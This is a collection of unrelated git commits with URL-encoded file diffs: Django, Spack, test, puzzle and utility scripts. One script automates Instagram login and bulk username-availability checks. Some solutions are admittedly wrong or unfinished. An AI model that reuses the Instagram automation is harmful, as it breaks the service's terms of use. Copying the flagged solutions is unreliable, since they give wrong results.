@@ -0,0 +1,824 @@
+#!/usr/bin/env python3%0A%22%22%22Run Django shell with imported modules%22%22%22%0Aif __name__ == %22__main__%22:%0A import os%0A%0A if not os.environ.get(%22PYTHONSTARTUP%22):%0A from subprocess import check_call%0A import sys%0A%0A base_dir = os.path.dirname(os.path.abspath(__file__))%0A%0A sys.exit(%0A check_call(%0A %5Bos.path.join(base_dir, %22manage.py%22), %22shell%22, *sys.argv%5B1:%5D%5D,%0A env=%7B**os.environ, %22PYTHONSTARTUP%22: os.path.join(base_dir, %22repl.py%22)%7D,%0A )%0A )%0A%0A # put imports here used by PYTHONSTARTUP%0A from django.conf import settings%0A%0A for app in settings.INSTALLED_APPS:%0A try:%0A exec( # pylint: disable=exec-used%0A %22from %7Bapp%7D.models import *%22.format(app=app)%0A )%0A except ModuleNotFoundError:%0A pass%0A
|
|
21799cbe81c57f80f66cb5a90992d6ff66c31e2d
|
Create new package. (#5919)
|
var/spack/repos/builtin/packages/r-hmisc/package.py
|
var/spack/repos/builtin/packages/r-hmisc/package.py
|
Python
| 0 |
@@ -0,0 +1,2543 @@
+##############################################################################%0A# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/llnl/spack%0A# Please also see the NOTICE and LICENSE files for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0A%0A%0Aclass RHmisc(RPackage):%0A %22%22%22Contains many functions useful for data analysis, high-level%0A graphics, utility operations, functions for computing sample size%0A and power, importing and annotating datasets, imputing missing%0A values, advanced table making, variable clustering, character%0A string manipulation, conversion of R objects to LaTeX and html%0A code, and recoding variables.%22%22%22%0A%0A homepage = %22http://biostat.mc.vanderbilt.edu/Hmisc%22%0A url = %22https://cran.rstudio.com/src/contrib/Hmisc_4.0-3.tar.gz%22%0A list_url = %22https://cran.r-project.org/src/contrib/Archive/Hmisc%22%0A%0A version('4.0-3', '7091924db1e473419d8116c3335f82da')%0A%0A depends_on('r-lattice', type=('build', 'run'))%0A depends_on('r-survival', type=('build', 'run'))%0A depends_on('r-formula', type=('build', 'run'))%0A depends_on('r-ggplot2', type=('build', 'run'))%0A depends_on('r-latticeextra', type=('build', 'run'))%0A depends_on('r-acepack', type=('build', 'run'))%0A depends_on('r-gridextra', type=('build', 'run'))%0A depends_on('r-data-table', type=('build', 'run'))%0A depends_on('r-htmltools', type=('build', 'run'))%0A depends_on('r-base64enc', type=('build', 'run'))%0A depends_on('r-htmltable', type=('build', 'run'))%0A depends_on('r-viridis', type=('build', 'run'))%0A
|
|
cf7c33e3b3d733f24376badac70392ecb5f5a323
|
add more tests
|
tests/test_build_definitions.py
|
tests/test_build_definitions.py
|
Python
| 0 |
@@ -0,0 +1,1416 @@
+from vdist.builder import Build%0Afrom vdist.source import git, directory, git_directory%0A%0A%0Adef test_build_projectroot_from_uri():%0A build = Build(%0A name='my build',%0A app='myapp',%0A version='1.0',%0A source=git(%0A uri='https://github.com/objectified/vdist',%0A branch='release-1.0'%0A ),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_project_root_from_source() == 'vdist'%0A%0A%0Adef test_build_projectroot_from_directory():%0A build = Build(%0A name='my build',%0A app='myapp',%0A version='1.0',%0A source=directory(path='/var/tmp/vdist'),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_project_root_from_source() == 'vdist'%0A%0A%0Adef test_build_projectroot_from_git_directory():%0A build = Build(%0A name='my build',%0A app='myapp',%0A version='1.0',%0A source=git_directory(%0A path='/var/tmp/vdist',%0A branch='release-1.0'%0A ),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_project_root_from_source() == 'vdist'%0A%0A%0Adef test_build_get_safe_dirname():%0A build = Build(%0A name='my build',%0A app='myapp-foo @#%5E&_',%0A version='1.0',%0A source=git_directory(%0A path='/var/tmp/vdist',%0A branch='release-1.0'%0A ),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_safe_dirname() == 'myapp-foo______-1.0-ubuntu-trusty'%0A
|
|
e19097216c090c0e3f4b68c743d6427f012ab69e
|
Add migration for legislator change
|
txlege84/legislators/migrations/0004_auto_20141201_1604.py
|
txlege84/legislators/migrations/0004_auto_20141201_1604.py
|
Python
| 0 |
@@ -0,0 +1,505 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('legislators', '0003_auto_20141120_1731'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='legislator',%0A name='party',%0A field=models.ForeignKey(related_name='legislators', blank=True, to='legislators.Party', null=True),%0A preserve_default=True,%0A ),%0A %5D%0A
|
|
01327c49590641c8fe918d91a7877aa67fd56e88
|
Add lc0172_factorial_trailing_zeroes.py
|
lc0172_factorial_trailing_zeroes.py
|
lc0172_factorial_trailing_zeroes.py
|
Python
| 0.000087 |
@@ -0,0 +1,584 @@
+%22%22%22Leetcode 172. Factorial Trailing Zeroes%0AEasy%0A%0AURL: https://leetcode.com/problems/factorial-trailing-zeroes/%0A%0AGiven an integer n, return the number of trailing zeroes in n!.%0A%0AExample 1:%0AInput: 3%0AOutput: 0%0AExplanation: 3! = 6, no trailing zero.%0A%0AExample 2:%0AInput: 5%0AOutput: 1%0AExplanation: 5! = 120, one trailing zero.%0ANote: Your solution should be in logarithmic time complexity.%0A%22%22%22%0A%0Aclass Solution(object):%0A def trailingZeroes(self, n):%0A %22%22%22%0A :type n: int%0A :rtype: int%0A %22%22%22%0A pass%0A%0A%0Adef main():%0A pass%0A%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
6a9b224834d1a523b03ce1e7c6ff4fa3ccea2583
|
Add tests for parse_utils.extract_tables.
|
tests/test_parse_utils.py
|
tests/test_parse_utils.py
|
Python
| 0 |
@@ -0,0 +1,1003 @@
+from pgcli.packages.parseutils import extract_tables%0A%0Adef test_simple_select_single_table():%0A tables = extract_tables('select * from abc')%0A assert tables == %5B'abc'%5D%0A%0Adef test_simple_select_multiple_tables():%0A tables = extract_tables('select * from abc, def')%0A assert tables == %5B'abc', 'def'%5D%0A%0Adef test_simple_select_with_cols_single_table():%0A tables = extract_tables('select a,b from abc')%0A assert tables == %5B'abc'%5D%0A%0Adef test_simple_select_with_cols_multiple_tables():%0A tables = extract_tables('select a,b from abc, def')%0A assert tables == %5B'abc', 'def'%5D%0A%0A#def test_select_with_hanging_comma_single_table():%0A #tables = extract_tables('select a, from abc')%0A #assert tables == %5B'abc'%5D%0A%0A#def test_select_with_hanging_comma_multiple_tables():%0A #tables = extract_tables('select a, from abc, def')%0A #assert tables == %5B'abc'%5D%0A%0A#def test_simple_insert_single_table():%0A #tables = extract_tables('insert into abc (id, name) values (1, %22def%22)')%0A #assert tables == %5B'abc'%5D%0A
|
|
897843932937faa841220cde90bdc89603d95615
|
Solve hackerrank linked list problem
|
hackerrank/linked-list/dedup.py
|
hackerrank/linked-list/dedup.py
|
Python
| 0.005101 |
@@ -0,0 +1,463 @@
+# https://www.hackerrank.com/challenges/delete-duplicate-value-nodes-from-a-sorted-linked-list/problem%0A%0Adef RemoveDuplicates(head):%0A if head is None:%0A return None%0A %0A curr = head%0A while curr.next is not None:%0A currentData = curr.data%0A next = curr.next;%0A nextData = next.data%0A %0A if currentData == nextData:%0A curr.next = curr.next.next%0A else: %0A curr = curr.next %0A return head
|
|
b3a20379162a068cc8f9a0f314a21a46ec40e4c6
|
Add simple unit test for snapshot iteration class
|
test.py
|
test.py
|
Python
| 0 |
@@ -0,0 +1,819 @@
+#!/usr/bin/env python%0A%0Aimport unittest%0Afrom fix_time_machine_backup import SnapshotList%0A%0Aclass TestSnapshotList(unittest.TestCase):%0A def setUp(self):%0A self.snapshot_list = SnapshotList(%5B%0A 'auto-20160820.2103-2m', %0A 'auto-20160821.0003-2m', %0A 'auto-20160821.1503-2m', %0A 'auto-20160821.2303-2m', %0A 'auto-20160823.1003-2m', %0A 'auto-20160825.1003-2m', %0A 'auto-20160827.0003-2m', %0A 'auto-20160827.1003-2m', %0A 'auto-20160828.0603-2m',%0A %5D)%0A%0A def test_get_next_snapshot(self):%0A self.assertEqual(self.snapshot_list.get_current_snapshot(), 'auto-20160828.0603-2m')%0A self.assertEqual(self.snapshot_list.get_next_snapshot(), 'auto-20160821.0003-2m')%0A%0A%0Aif __name__ == '__main__':%0A unittest.main()
|
|
aaea97c5cab778174b45cb2557d819deb769a45e
|
Create instagram_checker.py
|
instagram_checker.py
|
instagram_checker.py
|
Python
| 0.000035 |
@@ -0,0 +1,2998 @@
+import requests, argparse, sys%0A%0Aclass checker:%0A def __init__(self):%0A%0A #Declare some variables%0A self.headers = %7B'User-agent': 'Mozilla/5.0'%7D%0A self.loginurl = 'https://www.instagram.com/accounts/login/ajax/'%0A self.url = 'https://www.instagram.com/'%0A%0A #Start a session and update headers%0A self.s = requests.session()%0A self.s.headers.update(self.headers)%0A%0A%0A #Gets username, password, textfile to check usernames, and output file for available usernames.%0A parser = argparse.ArgumentParser()%0A parser.add_argument(%22-u%22, dest='username', help=%22Instagram username%22,%0A action=%22store%22)%0A parser.add_argument(%22-p%22, dest='password', help=%22Instagram password%22,%0A action=%22store%22)%0A parser.add_argument(%22-i%22, dest='inputf', help=%22Textfile with usernames%22,%0A action=%22store%22)%0A parser.add_argument(%22-o%22, dest='outputf', help=%22Output textfile%22,%0A action=%22store%22)%0A args = parser.parse_args()%0A%0A #Save variables from argparse%0A self.username = args.username%0A self.password = args.password%0A self.inputf = args.inputf%0A self.outputf = args.outputf%0A%0A def login(self, username, password):%0A #Logs into instagram%0A loginRequest = self.s.post(%0A self.loginurl,%0A headers=%7B%0A 'x-csrftoken': self.s.get(self.url).text.split('csrf_token%22: %22')%5B1%5D.split('%22')%5B0%5D,%0A 'x-instagram-ajax':'1',%0A 'x-requested-with': 'XMLHttpRequest',%0A 'Origin': self.url,%0A 'Referer': self.url,%0A %7D,%0A data=%7B%0A 'username':username,%0A 'password':password,%0A %7D%0A )%0A %0A if loginRequest.json()%5B'authenticated'%5D:%0A print('Logged In.')%0A else:%0A sys.exit(%22Login Failed, closing program.%22)%0A%0A def get_usernames(self, filename):%0A #Gets username from file%0A with open(filename, %22r%22) as f:%0A usernames = f.read().split(%22%5Cn%22)%0A return usernames%0A%0A def check_usernames(self, username, output):%0A #checks username and saves available usernames to new file%0A for user in usernames:%0A r = self.s.get(self.url+user)%0A al = r.text%0A text = al%5Bal.find('%3Ctitle%3E') + 7 :al.find('%3C/title%3E')%5D%0A if %22Page Not Found%22 in text:%0A with open(output, %22a%22) as a:%0A a.write(user+'%5Cn')%0A%0Aif __name__ == %22__main__%22:%0A check = checker()%0A check.login(check.username, check.password)%0A%0A #Clears output file for new usernames%0A with open(check.outputf, %22w%22) as a:%0A print('Output file cleared.')%0A %0A usernames = check.get_usernames(check.inputf)%0A check.check_usernames(usernames, check.outputf)%0A
|
|
20600b8cac9488ff416397de374c2d3dacf4afe4
|
add tests and netcdf-cxx4
|
var/spack/repos/builtin/packages/dealii/package.py
|
var/spack/repos/builtin/packages/dealii/package.py
|
from spack import *
class Dealii(Package):
"""C++ software library providing well-documented tools to build finite element codes for a broad variety of PDEs."""
homepage = "https://www.dealii.org"
url = "https://github.com/dealii/dealii/releases/download/v8.4.0/dealii-8.4.0.tar.gz"
version('8.4.0', 'ac5dbf676096ff61e092ce98c80c2b00')
depends_on ("cmake")
depends_on ("blas")
depends_on ("lapack")
depends_on ("mpi")
depends_on ("arpack-ng+mpi")
depends_on ("boost")
depends_on ("doxygen")
depends_on ("hdf5+mpi~cxx") #FIXME NetCDF declares dependency with ~cxx, why?
depends_on ("metis")
depends_on ("muparser")
depends_on ("netcdf")
#depends_on ("numdiff") #FIXME
depends_on ("oce")
depends_on ("p4est")
depends_on ("parmetis")
depends_on ("petsc+mpi")
depends_on ("slepc")
depends_on ("suite-sparse")
depends_on ("tbb")
depends_on ("trilinos")
def install(self, spec, prefix):
options = []
options.extend(std_cmake_args)
# CMAKE_BUILD_TYPE should be DebugRelease | Debug | Release
for word in options[:]:
if word.startswith('-DCMAKE_BUILD_TYPE'):
options.remove(word)
options.extend([
'-DCMAKE_BUILD_TYPE=DebugRelease',
'-DDEAL_II_WITH_THREADS:BOOL=ON'
'-DDEAL_II_WITH_MPI:BOOL=ON',
'-DCMAKE_C_COMPILER=%s' % join_path(self.spec['mpi'].prefix.bin, 'mpicc'), # FIXME: avoid hardcoding mpi wrappers names
'-DCMAKE_CXX_COMPILER=%s' % join_path(self.spec['mpi'].prefix.bin, 'mpic++'),
'-DCMAKE_Fortran_COMPILER=%s' % join_path(self.spec['mpi'].prefix.bin, 'mpif90'),
'-DARPACK_DIR=%s' % spec['arpack-ng'].prefix,
'-DBOOST_DIR=%s' % spec['boost'].prefix,
'-DHDF5_DIR=%s' % spec['hdf5'].prefix,
'-DMETIS_DIR=%s' % spec['metis'].prefix,
'-DMUPARSER_DIR=%s ' % spec['muparser'].prefix,
'-DNETCDF_DIR=%s' % spec['netcdf'].prefix,
'-DOPENCASCADE_DIR=%s' % spec['oce'].prefix,
'-DP4EST_DIR=%s' % spec['p4est'].prefix,
'-DPETSC_DIR=%s' % spec['petsc'].prefix,
'-DSLEPC_DIR=%s' % spec['slepc'].prefix,
'-DUMFPACK_DIR=%s' % spec['suite-sparse'].prefix,
'-DTBB_DIR=%s' % spec['tbb'].prefix,
'-DTRILINOS_DIR=%s' % spec['trilinos'].prefix
])
cmake('.', *options)
make()
make("test")
make("install")
|
Python
| 0 |
@@ -12,16 +12,30 @@
import *
+%0Aimport shutil
%0A%0Aclass
@@ -709,16 +709,21 @@
(%22netcdf
+-cxx4
%22)%0A #
@@ -2050,16 +2050,21 @@
%5B'netcdf
+-cxx4
'%5D.prefi
@@ -2525,24 +2525,24 @@
ake(%22test%22)%0A
-
make
@@ -2553,8 +2553,1187 @@
stall%22)%0A
+%0A # run some MPI examples with different solvers from PETSc and Trilinos%0A env%5B'DEAL_II_DIR'%5D = prefix%0A # take bare-bones step-3%0A with working_dir('examples/step-3'):%0A cmake('.')%0A make('release')%0A make('run',parallel=False)%0A%0A # take step-40 which can use both PETSc and Trilinos%0A # FIXME: switch step-40 to MPI run%0A with working_dir('examples/step-40'):%0A # list the number of cycles to speed up%0A filter_file(r'(const unsigned int n_cycles = 8;)', ('const unsigned int n_cycles = 2;'), 'step-40.cc')%0A cmake('.')%0A make('release')%0A make('run',parallel=False)%0A%0A # change Linear Algebra to Trilinos%0A filter_file(r'(#define USE_PETSC_LA.*)', (''), 'step-40.cc')%0A make('release')%0A make('run',parallel=False)%0A%0A with working_dir('examples/step-36'):%0A cmake('.')%0A make('release')%0A make('run',parallel=False)%0A%0A with working_dir('examples/step-54'):%0A cmake('.')%0A make('release')%0A # FIXME%0A # make('run',parallel=False)%0A
|
16aa4a292fafa2a74f668a56c5cf1a66f923df24
|
Make src.cm.tools a package
|
src/cm/tools/__init__.py
|
src/cm/tools/__init__.py
|
Python
| 0.000437 |
@@ -0,0 +1,70 @@
+%22%22%22@package cm.tools%0A@date Jun 6, 2014%0A%0A@author Zosia Soboci%C5%84ska%0A%22%22%22%0A%0A
|
|
519d6052e3bf16c8028d39eab374cd2aa17ffd4e
|
add position field to user committee
|
application/migrations/0014_usercommittee_position.py
|
application/migrations/0014_usercommittee_position.py
|
Python
| 0 |
@@ -0,0 +1,462 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('application', '0013_auto_20150313_2126'),%0A %5D%0A%0A operations = %5B%0A migrations.AddField(%0A model_name='usercommittee',%0A name='position',%0A field=models.CharField(max_length=255, default=''),%0A preserve_default=False,%0A ),%0A %5D%0A
|
|
557b0f30e0180a526433b65915d2a137144f2f05
|
add test_logger.py
|
tests/unit/test_logger.py
|
tests/unit/test_logger.py
|
Python
| 0.000007 |
@@ -0,0 +1,1050 @@
+# Tai Sakuma %[email protected]%3E%0Aimport logging%0A%0Aimport alphatwirl%0A%0A##__________________________________________________________________%7C%7C%0Adef test_logger_exist():%0A assert 'alphatwirl' in logging.Logger.manager.loggerDict%0A%0Adef test_len_handlers():%0A logger = logging.getLogger('alphatwirl')%0A assert len(logger.handlers) %3E= 1%0A%0A##__________________________________________________________________%7C%7C%0Adef test_example():%0A logger_names = logging.Logger.manager.loggerDict.keys()%0A loglevel_dict = %7Bl: logging.getLogger(l).getEffectiveLevel() for l in logger_names%7D%0A%0A # a dict of names and levels of loggers%0A # e.g.,%0A # %7B%0A # 'alphatwirl': 40,%0A # 'alphatwirl.delphes': 40,%0A # 'alphatwirl.loop': 40,%0A # 'pandas': 0,%0A # %7D%0A # %0A # https://docs.python.org/3/library/logging.html#logging-levels%0A # Level Numeric value%0A # CRITICAL 50%0A # ERROR 40%0A # WARNING 30%0A # INFO 20%0A # DEBUG 10%0A # NOTSET 0%0A%0A##__________________________________________________________________%7C%7C%0A
|
|
59b00a4f5cc5aa5139492660206c99185df24f7b
|
create unittest for area serializer for #191
|
popit/tests/test_area_api.py
|
popit/tests/test_area_api.py
|
Python
| 0 |
@@ -0,0 +1,485 @@
+from rest_framework.test import APITestCase%0Afrom rest_framework import status%0Afrom rest_framework.authtoken.models import Token%0Afrom popit.models import *%0A%0A%0Aclass AreaAPITestCase(APITestCase):%0A fixtures = %5B %22api_request_test_data.yaml%22 %5D%0A%0A def test_create_area_serializer(self):%0A pass%0A%0A def test_fetch_area_serializer(self):%0A client = self.client.get(%22/en/areas/b0c2dbaba8ea476f91db1e3c2320dcb7%22)%0A %0A%0A def test_update_area_serializer(self):%0A pass
|
|
a8274a5d5e4ec68f3ee594ffa741e90f11cf24db
|
Add tool to regenerate JSON files from P4 progs
|
tools/update_test_bmv2_jsons.py
|
tools/update_test_bmv2_jsons.py
|
Python
| 0.000001 |
@@ -0,0 +1,2155 @@
+#!/usr/bin/env python2%0A%0Aimport argparse%0Aimport fnmatch%0Aimport os%0Aimport subprocess%0Aimport sys%0A%0Adef find_files(root):%0A files = %5B%5D%0A for path_prefix, _, filenames in os.walk(root, followlinks=False):%0A for filename in fnmatch.filter(filenames, '*.p4'):%0A path = os.path.join(path_prefix, filename)%0A json_path = os.path.splitext(path)%5B0%5D + %22.json%22%0A if os.path.exists(json_path):%0A files.append(%5Bpath, json_path%5D)%0A return files%0A%0Adef check_compiler_exec(path):%0A try:%0A with open(os.devnull, 'w') as devnull:%0A subprocess.check_call(%5Bpath, %22--version%22%5D,%0A stdout=devnull, stderr=devnull)%0A return True%0A except subprocess.CalledProcessError:%0A return True%0A except OSError: # exec not found%0A return False%0A%0Adef main():%0A parser = argparse.ArgumentParser(%0A description=%22Search for P4 files recursively in provided directory %22%0A %22and if they have a JSON equivalent regenerates it using the bmv2 %22%0A %22compiler.%22)%0A parser.add_argument(%22--root%22, type=str, default=os.getcwd(),%0A help=%22Directory in which to recursively search for P4 %22%0A %22files. Default is current working directory.%22)%0A parser.add_argument(%22--compiler%22, type=str, default=%22p4c-bmv2%22,%0A help=%22bmv2 compiler to use. Default is p4c-bmv2.%22)%0A args = parser.parse_args()%0A%0A if not check_compiler_exec(args.compiler):%0A print %22Cannot use provided compiler%22%0A sys.exit(1)%0A%0A files = find_files(args.root)%0A for input_f, output_f in files:%0A print %22Regenerating%22, input_f, %22-%3E%22, output_f%0A try:%0A cmd = %5Bargs.compiler, input_f, %22--json%22, output_f, %22--keep-pragmas%22%5D%0A with open(os.devnull, 'w') as devnull:%0A out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)%0A except subprocess.CalledProcessError:%0A print %22ERROR%22%0A print %22 %22.join(cmd)%0A print out%0A except OSError:%0A print %22FATAL ERROR%22%0A sys.exit(2)%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
f1d3717b45650244d9a4f44caf6f610636bb72ee
|
Add other_data_collections/2015ApJ...812...60B/biteau.py
|
other_data_collections/2015ApJ...812...60B/biteau.py
|
other_data_collections/2015ApJ...812...60B/biteau.py
|
Python
| 0 |
@@ -0,0 +1,558 @@
+%22%22%22%0AScript to check and ingest Biteau & Williams (2015) data for gamma-cat.%0A%22%22%22%0Afrom astropy.table import Table%0A%0A%0Aclass Biteau:%0A def __init__(self):%0A filename = 'other_data_collections/2015ApJ...812...60B/BiteauWilliams2015_AllData_ASDC_v2016_12_20.ecsv'%0A self.table = Table.read(filename, format='ascii.ecsv', delimiter='%7C')%0A%0A def run_checks(self):%0A # self.table.pprint()%0A self.table.show_in_browser(jsviewer=True)%0A self.table.info('stats')%0A%0A%0Aif __name__ == '__main__':%0A biteau = Biteau()%0A biteau.run_checks()%0A
|
|
6f7fd163106ec5f4346eaaef04ed9726a3289801
|
add wrong reversesubstring problem solution
|
problems/reversesubstring.py
|
problems/reversesubstring.py
|
Python
| 0.995257 |
@@ -0,0 +1,871 @@
+import sys%0A%0Atest = %22aabbbbababaaabbab%22%0A%0A%22%22%22%0AFind a) the first occurrence of b in string%0A b) the longest list of only as in string, store final index%0A%22%22%22%0A%0Adef solution(string):%0A firstB = string.find('b')%0A print ((string, firstB))%0A if(firstB == -1):%0A return (0, 0)%0A longestA = 0%0A longestAIndex = 0%0A currentA = 0%0A currentAIndex = 0%0A for i in range(firstB, len(string)):%0A if (string%5Bi%5D == 'a'):%0A print (%22found a%22, str(i))%0A currentAIndex = i%0A currentA += 1%0A if(currentA %3E longestA):%0A longestA = currentA%0A longestAIndex = currentAIndex%0A if(string%5Bi%5D == 'b'):%0A currentA = 0%0A return (firstB, longestAIndex)%0A %0A%0Aif __name__ == '__main__':%0A if (len(sys.argv) %3E 1):%0A print(solution(sys.argv%5B1%5D))%0A else:%0A print(solution(test))%0A%0A
|
|
9ff1b6ffa297199dc73042382c369fc7af0813fc
|
Create stress_test1.py
|
home/moz4r/Test/stress_test1.py
|
home/moz4r/Test/stress_test1.py
|
Python
| 0.000033 |
@@ -0,0 +1,653 @@
+# stress test%0A%0Afrom time import sleep%0Aimport random%0A%0AleftPort = %22COM3%22%0A%0Ai01 = Runtime.createAndStart(%22i01%22, %22InMoov%22)%0Asleep(1)%0Ai01.startMouth()%0Ai01.startHead(leftPort)%0Ai01.startLeftHand(leftPort)%0Ai01.head.jaw.map(0,180,85,110)%0Ai01.startMouthControl(leftPort)%0A%0A%0Ai01.leftHand.thumb.setVelocity(random.randint(100,300))%0A%09%0AMoveRandomTimer = Runtime.start(%22MoveRandomTimer%22,%22Clock%22)%0A%0Adef MoveRandom(timedata):%0A%09%0A%09i01.leftHand.thumb.moveTo(random.randint(50,130))%0A%09MoveRandomTimer.setInterval(random.randint(10000,11000))%0A%09i01.mouth.speak(%22voice test voice test%22)%0A%09%0AMoveRandomTimer.addListener(%22pulse%22, python.name, %22MoveRandom%22)%0AMoveRandomTimer.startClock()%0A
|
|
a183922bd275414259800e75fd78db980604fa20
|
create thread3
|
threading/thread3_join.py
|
threading/thread3_join.py
|
Python
| 0 |
@@ -0,0 +1,495 @@
+import threading%0Aimport time%0Adef thread_job():%0A print('T1 start%5Cn')%0A for i in range(10):%0A time.sleep(0.1)%0A print('T1 finish%5Cn')%0A%0Adef T2_job():%0A print('T2 start%5Cn')%0A print('T2 finish%5Cn')%0A%0Adef main():%0A added_thread = threading.Thread(target=thread_job, name='T1')%0A thread2 = threading.Thread(target=T2_job, name='T2')%0A added_thread.start()%0A thread2.start()%0A thread2.join()%0A added_thread.join()%0A%0A print('all done%5Cn')%0A%0Aif __name__ == '__main__':%0A main()
|
|
143dbdb6d0d9840c4991eadbb2f5459398a6ddae
|
Add a 'cache' which only caches ETOPO1 files.
|
joerd/store/cache.py
|
joerd/store/cache.py
|
Python
| 0 |
@@ -0,0 +1,1616 @@
+from joerd.mkdir_p import mkdir_p%0Afrom joerd.plugin import plugin%0Afrom os import link%0Aimport os.path%0A%0A%0Aclass CacheStore(object):%0A %22%22%22%0A Every tile that gets generated requires ETOPO1. Rather than re-download%0A it every time (it's 446MB), we cache that file only.%0A%0A This is a bit of a hack, and would be better replaced by a generic%0A fixed-size LRU/LFU cache. Even better if the cache could be shared%0A between multiple Joerd processes on the same host.%0A %22%22%22%0A%0A def __init__(self, cfg):%0A create_fn = plugin('store', store_type, 'create')%0A self.store = create_fn('store', cfg%5B'store'%5D)%0A self.cache_dir = cfg%5B'cache_dir'%5D%0A%0A def upload_all(self, d):%0A self.store.upload_all(d)%0A%0A @contextmanager%0A def upload_dir(self):%0A with tmpdir() as t:%0A yield t%0A self.upload_all(t)%0A%0A def exists(self, filename):%0A return self.store.exists(filename)%0A%0A def get(self, source, dest):%0A if 'ETOPO1' in source:%0A cache_path = os.path.join(self.cache_dir, source)%0A if not os.path.exists(cache_path):%0A mkdir_p(os.path.dirname(cache_path))%0A self.store.get(source, cache_path)%0A%0A # hard link to dest. this makes it non-portable, but means that%0A # we don't have to worry about whether GDAL supports symbolic%0A # links, and we don't have to worry about deleting files, as they%0A # are reference counted by the OS.%0A link(cache_path, dest)%0A%0A else:%0A self.store.get(source, dest)%0A%0A%0Adef create(cfg):%0A return CacheStore(cfg)%0A
|
|
679ae2966f44a071630934c7b7d9eeb550a59223
|
Create balance_array.py
|
balance_array.py
|
balance_array.py
|
Python
| 0.000521 |
@@ -0,0 +1,1720 @@
+'''%0A%60Balance Array%60%0A%0AFind i in array A where: A%5B1%5D + A%5B2%5D...A%5Bi-1%5D = A%5Bi+1%5D + A%5Bi+2%5D...A%5Blen(A)%5D%0A%0AWrite a %60balanceSum%60 function which take an integer array as input,%0Ait should return the smallest i, where i is an index in the array such that%0Athe sum of elements to its left is equal to the sum of elements to its right.%0A%0ANote: There always exist a solution.%0A'''%0A%0A'''%0ATODO: use %60pytest%60 or the likes to run tests more easily.%0A'''%0A%0Adef balanceSum(A):%0A # Slow performance, need optimization%0A%0A # Iterate from 1-%3EN-1 instead of 0-%3EN or 1-%3EN+1, b/c the %60balance%60 index%0A # can not be 0 or N, checking for them is pointless.%0A # Also iterate from 1-%3EN-1 is obviously faster than 0-%3EN or 1-%3EN+1.%0A for i in range(1, len(A)):%0A left_sum = sum(A%5B:i-1%5D)%0A right_sum = sum(A%5Bi:%5D)%0A%0A if left_sum == right_sum:%0A return i%0A%0A return None%0A%0Adef balanceSum2(A):%0A # currently is wrong%0A left_sum, right_sum = 0, sum(A)%0A%0A for i, value in enumerate(A):%0A i += 1%0A%0A if left_sum == right_sum:%0A return i%0A%0A left_sum += A%5Bi-1%5D%0A right_sum -= A%5Bi%5D%0A%0A print i, left_sum, right_sum%0A%0A return None%0A%0Adef test_one(func):%0A inp = %5B4,1,2,3,3%5D%0A out = 3%0A%0A if out != func(inp):%0A return False%0A return True%0A%0Adef test_two(func):%0A inp = %5B3,1,2,1%5D%0A out = 2%0A%0A if out != func(inp):%0A return False%0A return True%0A%0Adef test_three(func):%0A inp = %5B3,1,3,1%5D%0A out = 2%0A%0A if out != func(inp):%0A return False%0A return True%0A%0Adef main():%0A test_func = balanceSum%0A print test_one(test_func)%0A print test_two(test_func)%0A print test_three(test_func)%0A%0Aif __name__ == '__main__':%0A import sys%0A sys.exit(int(main() or 0))%0A
|
|
19dd8b925b188bc09eb85952db1f9f11db4c570e
|
add batch pics
|
batch_cut_pic.py
|
batch_cut_pic.py
|
Python
| 0 |
@@ -0,0 +1,1297 @@
+#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%0A#function: %E5%89%AA%E5%88%87%E6%9B%B4%E6%94%B9%E5%9B%BE%E7%89%87%E5%B0%BA%E5%AF%B8%E5%A4%A7%E5%B0%8F%0Aimport os%0Aimport os.path%0Aimport sys, getopt, argparse%0Afrom PIL import Image%0A%0Afrom change_pic_size_by_cut import CutImage%0A%0Adef main():%0A%09argc = len(sys.argv)%0A%09cmdargs = str(sys.argv)%0A%09parser = argparse.ArgumentParser(description=%22Tool for batch cut the image%22)%0A%09parser.add_argument('-f', '--fromdir', required=True, help='the directory path of the input file')%0A%09parser.add_argument('-H', '--height',type=int, required=True, help='height of the output file')%0A%09parser.add_argument('-W', '--width',type=int, required=True, help='width of the output file')%0A%09parser.add_argument('-d', '--outdir', required=True, help='the directory of the output file')%0A%09parser.add_argument('-T', '--type', required=False, help='the type of the output file: jpeg, git, png ,etc')%0A%09args = parser.parse_args()%0A%09fromdir = args.fromdir%0A%09outdir = args.outdir%0A%09width = args.width%0A%09height = args.height%0A%09if args.type == None:%0A%09%09type = 'png'%0A%09else:%0A%09%09type = args.type%0A%09for file in os.listdir(fromdir):%0A%09%09if file == %22desktop.ini%22:%0A%09%09%09continue%0A%09%09filein = os.path.join(fromdir, file)%0A%09%09fileout = os.path.join(outdir, file)%0A%09%09try:%0A%09%09%09CutImage(filein, fileout, width, height, type)%0A%09%09except Exception as e:%0A%09%09%09print(e)%0A%09%09%09continue%0Aif __name__ == '__main__':%0A%09main()
|
|
41933fa83138f3572b899839a721b95b877d09e6
|
Sample code for create customer payment profile
|
